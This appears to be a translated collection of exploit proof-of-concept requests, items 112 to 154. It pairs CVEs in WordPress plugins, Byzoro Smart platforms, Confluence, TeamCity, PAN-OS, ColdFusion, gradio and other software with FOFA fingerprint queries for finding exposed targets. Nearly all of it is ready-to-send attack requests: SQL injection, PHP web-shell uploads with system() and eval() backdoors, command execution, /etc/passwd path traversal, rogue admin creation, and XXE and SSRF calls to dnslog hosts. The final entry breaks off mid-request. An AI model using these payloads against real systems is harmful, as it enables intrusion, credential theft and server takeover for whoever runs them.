GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "第一步获得的值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the back end directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Back-end address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: visit
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
